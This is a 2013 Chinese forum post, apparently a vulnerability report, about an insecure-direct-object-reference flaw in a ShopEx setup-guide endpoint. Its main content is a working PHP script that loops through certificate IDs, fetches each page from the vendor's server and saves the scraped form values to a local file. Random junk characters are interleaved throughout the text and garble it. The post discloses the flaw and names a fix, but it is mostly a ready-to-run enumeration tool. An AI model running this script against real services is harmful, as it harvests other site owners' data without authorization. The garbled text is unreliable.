|
|
简要描述:
; W- f9 G; ~1 ?% B4 K8 v! z' s) EShopEx某接口缺陷,可遍历所有网站. E- N# R) `' J# g/ |
详细说明:
* }) f7 }( r( w0 o! |4 p问题出现在shopex 网店使用向导页面
2 S9 r/ i" o [9 C$ H" u
9 p0 b9 ^2 E" q3 y) ~. r- |' r5 e3 }, [1 ~
) r( W3 o7 S8 L6 Thttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
" L" H7 e! S0 @( {3 j0 q
, W# h, B' V- b0 ~* e, x2 S+ L! Q5 y8 k+ D( W- Y) G
" M J1 O" @/ m. F, r" d
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
0 d+ T1 u; T* F: }$ c0 |" c% X
+ g* [5 l' \/ l0 M& _1 N) D Y; R4 N7 R, L5 p; v8 d5 Y+ U( L9 z
7 ?- B3 k- y- N! g+ |) { t
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 3 b/ Z$ [1 Z5 M0 X, f
5 V, ?; ~- D5 V' p
; T4 }% b/ \- Z+ X
4 u- b$ Z$ l7 f+ D& T$ J<?php; H" T! r+ e; {9 t
' |% X9 k* z* m4 p) ~ for ($i=1; $i < 10000; $i++) { //遍历9 Z6 d9 e! D' g! x
9 T+ Y% ~3 v1 \3 {" m
ShowshopExD($i);& X8 U9 w$ {6 R" i3 l' }
# m8 B3 I! F. |" j
}
6 o! M3 x; U! G' ?! @9 h; g; k) J D" c4 v
function ShowshopExD($cid) {& y9 m9 a+ c7 K) [3 o
) b' M! a4 ^$ ?, b
$url='http://guide.ecos.shopex.cn/step2.php';
0 y2 y" j0 D# ^" \3 y+ M9 g L2 o% e& ]( H; I
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');5 c$ U6 S$ Z+ q6 i
% g' R' l' @2 n: p6 W $url = $url.'?refer='.$refer;" L5 d6 [5 [% e0 V5 r4 d1 K
/ z3 I" }) L7 `! H0 l
$ch = curl_init($url);7 {! W; E5 ^: L1 [. s3 G9 B
; Q* ~( V+ Q2 v5 c* `" z
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;) s# @( R6 P; F6 C; m
5 q# I4 _; ]( m) q! ?1 v
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
( ^, c8 v4 y! Y! H" \" N7 r1 _: g# V' W3 l5 r. e0 S* K( @+ Y
$result = curl_exec($ch);- y: E/ {: a1 n7 w
1 n3 u- P% ~: P. j7 c
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
8 y9 l. r; r: x4 V" h3 p J6 a$ @
' k8 \1 \# _" \* P& J- x/ Q if(strpos($result,$refer))
8 c, \* W9 h1 V8 c$ U4 p$ V% K. {. B6 P- @0 v0 \' ?% V
{! n; p( j6 s* Y# R
# A9 \# g% d6 Y2 [& H' E& i $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
[$ M* y4 X1 f9 @$ G
s6 r$ E. ]2 V+ P/ [! F preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
7 h9 d" g7 { {+ G1 a8 Z& D2 |
0 T! H: D$ {: R. I0 P1 m+ R foreach ($value[1] as $key) {
) _& [) ^& \. m) {$ Q# S; Y+ o% r" q0 R
) `# z+ x$ [8 j9 I7 q1 } preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
# @0 h0 R3 T! B+ ]/ A: g
`! A- f. w5 n+ h# n echo $res[1][0].':'.$res[3][0]."\r\n";/ p0 j, ]" F2 v. a* N* T6 d" X$ R
6 U% G! a9 `9 x: G2 y! [2 C! a( K
$col =$res[1][0].':'.$res[3][0]."\r\n";
' E& ^& F. s$ {* W) a" ?8 J, D* a; P! H3 ]3 r$ ?5 D' I3 X
fwrite($fp, $col, strlen($col)); ; }" I/ t1 S, q$ W+ r% L+ Q
- p! ?/ h6 n. e8 ^, Q3 F
}
# z9 U1 o" O# x5 `! r
6 Q# @# s0 J2 [+ k echo '--------------------------------'."\r\n";
! n5 s7 @( ]! j, A+ P- i$ Y) s! z; \- v
fclose($fp);
1 z P- U& V" e1 D. w8 t
& p, q- I3 d+ C' m9 d }: _0 c8 Y" x! \' L
3 T+ N# G0 s/ ^9 w. s
flush();
) i s1 Z* I6 `* f; A; y, Q$ I2 p$ b
curl_close($ch);
) ]: Y- L; E! C4 x. X0 v
2 Y o8 {9 X$ p* a+ n6 C5 R/ I& j; z }# `1 b/ W3 G$ g' Y3 Z. b
& H: z J/ R. b?>
! D5 S/ U5 v+ A; V/ B) H漏洞证明:& y3 z2 J8 e G0 p, V
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
' G& T$ r* L7 ^; arefer换成其他加密方式
% L, C* l7 s- v% H8 Z2 P9 E |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对